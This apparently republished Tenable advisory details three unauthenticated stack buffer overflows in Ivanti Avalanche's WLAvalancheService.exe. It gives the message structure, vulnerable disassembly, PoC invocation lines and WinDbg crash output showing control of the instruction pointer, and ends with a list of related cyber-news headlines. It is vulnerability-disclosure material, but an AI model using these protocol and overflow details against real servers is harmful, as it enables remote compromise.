CVE-2023-46216

Multiple vulnerabilities exist in Ivanti Avalanche v6.4.1 WLAvalancheService.exe.CVE-2023-41727 - MuProperty type 100 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)A message sent to WLAvalancheService.exe on TCP port 1777 has the following structure:// be = big-endian strut msg { preamble pre; hp hdrpay; }; struct preamble { be32 MsgSize; // size of hp + 16 be32 HdrSize; // size of hp.hdr be32 PayloadSize // size of hp.payload be32 unk; }; // header + payload struct hp { MuProperty hdr[]; // hdr as array of MuProperty structure(s) MuProperty payload[]; // payload as array of MuProperty structure(s) byte pad[]; // zero-padded to 16-byte boundary }; struct MuProperty { be32 type; // property type, valid: 1-9, 100-102 be32 NameSize; be32 ValueSize; byte name[NameSize]; byte value[ValueSize]; // format depends on @type // 3 - hex string // 9 - list of decimal strings separated by ; // 100-102 - list of tokens separated by ; };When processing a MuProperty type 100, WLAvalancheService.exe copies user-supplied data to a fixed-size stack-based buffer. An unauthenticated remote attacker can specify a long MuProperty type 100 to overflow the buffer. The following code snippet shows vulnerability:// WLAvalancheService.exe in Avalanche v6.4.1 [...] .text:0042AF00 mov ecx, [ebp+TokenSize] ; attacker-controlled token size .text:0042AF03 mov esi, [ebp+pbToken] ; attacker-controlled token data .text:0042AF06 lea edi, [ebp+buf80] ; fixed-size stack buf -> .text:0042AF06 ; stack overflow !!! .text:0042AF0C mov eax, ecx .text:0042AF0E shr ecx, 2 .text:0042AF11 memcpy .text:0042AF11 rep movsd .text:0042AF13 mov ecx, eax .text:0042AF15 and ecx, 3 .text:0042AF18 rep movsb [...]PoC:python3 avalanche_v6.4.1_WLAvalancheService_stack_bof.py -t <target-host> -p 1777 --vuln 1 Attempting to overflow a stack-based buffer using MuProperty type 100... Traceback (most recent call last): File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 86, in <module> res = recv_msg(s) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 32, in recv_msg data = recvall(sock, 0x10) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 22, in recvall packet = sock.recv(n - len(data)) ConnectionResetError: [Errno 104] Connection reset by peer Sample crash in WinDbg: 0:059> g (102c.29dc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\Wavelink\Avalanche\MobileDeviceServer\WLAvalancheService.exe eax=00001000 ebx=025ab100 ecx=000002a2 edx=00000000 esi=0274ee11 edi=04cc0000 eip=0042af11 esp=04cbfa4c ebp=04cbfb1c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 WLAvalancheService+0x2af11: 0042af11 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:041> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 04cbfb1c 41414141 41414141 41414141 41414141 WLAvalancheService+0x2af11 01 04cbfb20 41414141 41414141 41414141 41414141 0x41414141 02 04cbfb24 41414141 41414141 41414141 41414141 0x41414141 03 04cbfb28 41414141 41414141 41414141 41414141 0x41414141 [...]CVE-2023-46216 - MuProperty type 101 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)When processing a MuProperty type 101, WLAvalancheService.exe copies user-supplied data to a fixed-size stack-based buffer. An unauthenticated remote attacker can specify a long MuProperty type 101 to overflow the buffer. The following code snippet shows vulnerability:// WLAvalancheService.exe in Avalanche v6.4.1 [...] .text:0042B1A7 mov ecx, [ebp+TokenSize] ; attacker-controlled token size .text:0042B1AA mov esi, [ebp+pbToken] ; attacker-controlled token data .text:0042B1AD lea edi, [ebp+buf80] ; fixed-size stack buf -> .text:0042B1AD ; stack overflow !!! .text:0042B1B3 mov eax, ecx .text:0042B1B5 shr ecx, 2 .text:0042B1B8 memcpy .text:0042B1B8 rep movsd .text:0042B1BA mov ecx, eax .text:0042B1BC and ecx, 3 .text:0042B1BF rep movsb [...]PoC:python3 avalanche_v6.4.1_WLAvalancheService_stack_bof.py -t <target-host> -p 1777 --vuln 2 Attempting to overflow a stack-based buffer using MuProperty type 101... Traceback (most recent call last): File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 86, in <module> res = recv_msg(s) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 32, in recv_msg data = recvall(sock, 0x10) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 22, in recvall packet = sock.recv(n - len(data)) ConnectionResetError: [Errno 104] Connection reset by peer Sample crash in WinDbg: 0:060> g (259c.17e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\Wavelink\Avalanche\MobileDeviceServer\WLAvalancheService.exe eax=00001000 ebx=025c8a68 ecx=000002a2 edx=00000001 esi=02765621 edi=04f60000 eip=0042b1b8 esp=04f5fa4c ebp=04f5fb1c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 WLAvalancheService+0x2b1b8: 0042b1b8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:042> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 04f5fb1c 41414141 41414141 41414141 41414141 WLAvalancheService+0x2b1b8 01 04f5fb20 41414141 41414141 41414141 41414141 0x41414141 02 04f5fb24 41414141 41414141 41414141 41414141 0x41414141 03 04f5fb28 41414141 41414141 41414141 41414141 0x41414141 [...]CVE-2023-46217 - MuProperty type 102 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)When processing a MuProperty type 102, WLAvalancheService.exe copies user-supplied data to a fixed-size stack-based buffer. An unauthenticated remote attacker can specify a long MuProperty type 102 to overflow the buffer. The following code snippet shows vulnerability:// WLAvalancheService.exe in Avalanche v6.4.1 [...] .text:0042B27D mov ecx, [ebp+TokenSize] ; attacker-controlled token size .text:0042B280 mov esi, [ebp+pbToken] ; attacker-controlled token data .text:0042B283 lea edi, [ebp+buf80] ; fixed-size stack buf -> .text:0042B283 ; stack overflow !!! .text:0042B289 mov eax, ecx .text:0042B28B shr ecx, 2 .text:0042B28E memcpy .text:0042B28E rep movsd .text:0042B290 mov ecx, eax .text:0042B292 and ecx, 3 .text:0042B295 rep movsb [...]PoC:python3 avalanche_v6.4.1_WLAvalancheService_stack_bof.py -t <target-host> -p 1777 --vuln 3 Attempting to overflow a stack-based buffer using MuProperty type 102... Traceback (most recent call last): File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 86, in <module> res = recv_msg(s) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 32, in recv_msg data = recvall(sock, 0x10) File "/work/0day/avalanche_v6.4.1_WLAvalancheService_stack_bof.py", line 22, in recvall packet = sock.recv(n - len(data)) ConnectionResetError: [Errno 104] Connection reset by peer Sample crash in WinDbg: 0:060> g (2a44.1f28): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\Wavelink\Avalanche\MobileDeviceServer\WLAvalancheService.exe eax=00001000 ebx=025cbc48 ecx=000002a2 edx=0275ab2a esi=0275a0a1 edi=04f60000 eip=0042b28e esp=04f5fa4c ebp=04f5fb1c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 WLAvalancheService+0x2b28e: 0042b28e f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:044> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 04f5fb1c 41414141 41414141 41414141 41414141 WLAvalancheService+0x2b28e 01 04f5fb20 41414141 41414141 41414141 41414141 0x41414141 02 04f5fb24 41414141 41414141 41414141 41414141 0x41414141 03 04f5fb28 41414141 41414141 41414141 41414141 0x41414141 [...] 

This Cyber News was published on www.tenable.com. Publication date: Tue, 19 Dec 2023 08:46:03 +0000


Cyber News related to CVE-2023-46216

CVE-2023-46216 - Multiple vulnerabilities exist in Ivanti Avalanche v6.4.1 WLAvalancheService.exe.CVE-2023-41727 - MuProperty type 100 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)A message sent to WLAvalancheService.exe on TCP port 1777 ...
6 months ago Tenable.com
Vulnerability Summary for the Week of November 27, 2023 - PrimaryVendor - Product apple - multiple products Description A memory corruption vulnerability was addressed with improved locking. Published 2023-12-01 CVSS Score not yet calculated Source & Patch Info CVE-2023-48842 PrimaryVendor - Product dell - ...
7 months ago Cisa.gov
CVE-2024-37051 - GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 ...
3 weeks ago Tenable.com
CVE-2023-46217 - Multiple vulnerabilities exist in Ivanti Avalanche v6.4.1 WLAvalancheService.exe.CVE-2023-41727 - MuProperty type 100 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)A message sent to WLAvalancheService.exe on TCP port 1777 ...
6 months ago Tenable.com
CVE-2023-41727 - Multiple vulnerabilities exist in Ivanti Avalanche v6.4.1 WLAvalancheService.exe.CVE-2023-41727 - MuProperty type 100 stack-based buffer overflow (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)A message sent to WLAvalancheService.exe on TCP port 1777 ...
6 months ago Tenable.com
Patching Perforce perforations: Critical RCE vulnerability discovered in Perforce Helix Core Server - Sig 11,887 p4api vs2017 static openssl3 p4api-2023.1.2468153-vs2017 static. Sig 11,847 p4api vs2017 static p4api-2023.1.2468153-vs2017 static. Sig 10,187 p4api vs2017 static vsdebug openssl3 p4api-2023.1.2468153-vs2017 static vsdebug. Sig 10,147 ...
6 months ago Microsoft.com
Threat landscape for industrial automation systems. H2 2023 - In the second half of 2023, the percentage of ICS computers on which malicious objects were blocked decreased by 2.1 pp to 31.9%. Percentage of ICS computers on which malicious objects were blocked, by half year. In H2 2023, building automation once ...
3 months ago Securelist.com
Multiple Flaws in Dell PowerProtect Products Execute Commands - Multiple vulnerabilities have been discovered in Dell's PowerProtect, which were associated with SQL injection, cross-site scripting, privilege escalation, command injection, and path tracing. The severity for these vulnerabilities ranges between 4.3 ...
6 months ago Cybersecuritynews.com
10 of the biggest zero-day attacks of 2023 - Here are 10 of the biggest zero-day attacks of 2023 in chronological order. Zero-day attacks started strong in 2023 with CVE-2023-0669, a pre-authentication command injection vulnerability in Fortra's GoAnywhere managed file transfer product. ...
6 months ago Techtarget.com
Ransomware in 2023 recap: 5 key takeaways - This provides the best overall picture of ransomware activity, but the true number of attacks is far higher. While some ransomware trends hardly changed over the last year, such as LockBit's continued dominance, ransomware criminals also challenged ...
4 months ago Malwarebytes.com
Vulnerability Summary for the Week of March 4, 2024 - Published 2024-03-06 CVSS Score not yet calculated Source & Patch Info CVE-2023-52584416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67 PrimaryVendor - ...
3 months ago Cisa.gov
Multiple QNAP Severity Flaw Let Attackers Execute Remote Code - QNAP has released multiple security advisories for addressing several high, medium, and low-severity vulnerabilities in multiple products, including QTS, QuTS hero, Netatalk, Video Station, QuMagie, and QcalAgent. QNAP has also stated all the ...
5 months ago Gbhackers.com
Google Patches Another Chrome Zero-Day as Browser Attacks Mount - For the fourth time since August, Google has disclosed a bug in its Chrome browser technology that attackers were actively exploiting in the wild before the company had a fix for it. Integer Overflow Bug The latest zero-day, which Google is tracking ...
7 months ago Darkreading.com
PixieFail flaws impact PXE network boot in enterprise systems - A set of nine vulnerabilities, collectively called 'PixieFail,' impact the IPv6 network protocol stack of Tianocore's EDK II, the open-source reference implementation of the UEFI specification widely used in enterprise computers and servers. The ...
5 months ago Bleepingcomputer.com
TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities - Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative targets. WinRAR vulnerabilities provide an entry point to manipulate compressed files, potentially executing malicious code on a victim's ...
6 months ago Gbhackers.com
Google fixes first actively exploited Chrome zero-day of 2024 - Google has released security updates to fix the first Chrome zero-day vulnerability exploited in the wild since the start of the year. The company fixed the zero-day for users in the Stable Desktop channel, with patched versions rolling out worldwide ...
5 months ago Bleepingcomputer.com
Unpatched Loytec Building Automation Flaws Disclosed 2 Years After Discovery - Industrial cybersecurity firm TXOne Networks has disclosed the details of 10 unpatched vulnerabilities discovered by its researchers in building automation products made by Austrian company Loytec more than two years ago. The vulnerabilities have ...
6 months ago Securityweek.com
Akamai discloses zero-click exploit for Microsoft Outlook - While examining a previous bypass mitigation, Akamai Technologies discovered two new Windows vulnerabilities that could allow an attacker to create a zero-click exploit against Microsoft Outlook clients. In a two-part report published Monday, Akamai ...
6 months ago Techtarget.com
Google Rushes to Patch Eighth Chrome Zero-Day This Year - Google on Wednesday announced emergency patches for a Chrome vulnerability that is under active exploitation. The issue, tracked as CVE-2023-7024, is described as a high-severity heap buffer overflow bug in Chrome's WebRTC component. Supported by ...
6 months ago Securityweek.com
Google Rushes to Patch Eighth Chrome Zero-Day This Year - Google on Wednesday announced emergency patches for a Chrome vulnerability that is under active exploitation. The issue, tracked as CVE-2023-7024, is described as a high-severity heap buffer overflow bug in Chrome's WebRTC component. Supported by ...
6 months ago Packetstormsecurity.com
CISA: Critical SharePoint vuln is under active exploitation The Register - Security experts claim ransomware criminals have got their hands on a functional exploit for a nearly year-old critical Microsoft SharePoint vulnerability that was this week added to the US's must-patch list. When vulnerabilities are added to CISA's ...
5 months ago Theregister.com
Cyber Insights 2023: The Geopolitical Effect - The result is more than a dozen features on subjects ranging from AI, quantum encryption, and attack surface management to venture capital, regulations, and criminal gangs. The Russia/Ukraine war that started in early 2022 has been mirrored by a ...
1 year ago Securityweek.com
Google Fixes a Seventh Zero-Day Flaw in Chrome-Update Now - Google's Pixel devices have already received the November update, along with some additional fixes. The update fixes 59 vulnerabilities, two of which are already being exploited in real-life attacks. Tracked as CVE-2023-36033, the first is an ...
7 months ago Wired.com
Critical Apache OFBiz Vulnerability in Attacker Crosshairs - The Shadowserver Foundation has been seeing attempts to exploit a critical vulnerability affecting the Apache OFBiz open source enterprise resource planning system. Apache OFBiz is leveraged by several ERP and other types of projects, including the ...
6 months ago Securityweek.com
Critical Apache OFBiz Vulnerability in Attacker Crosshairs - The Shadowserver Foundation has been seeing attempts to exploit a critical vulnerability affecting the Apache OFBiz open source enterprise resource planning system. Apache OFBiz is leveraged by several ERP and other types of projects, including the ...
6 months ago Packetstormsecurity.com

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)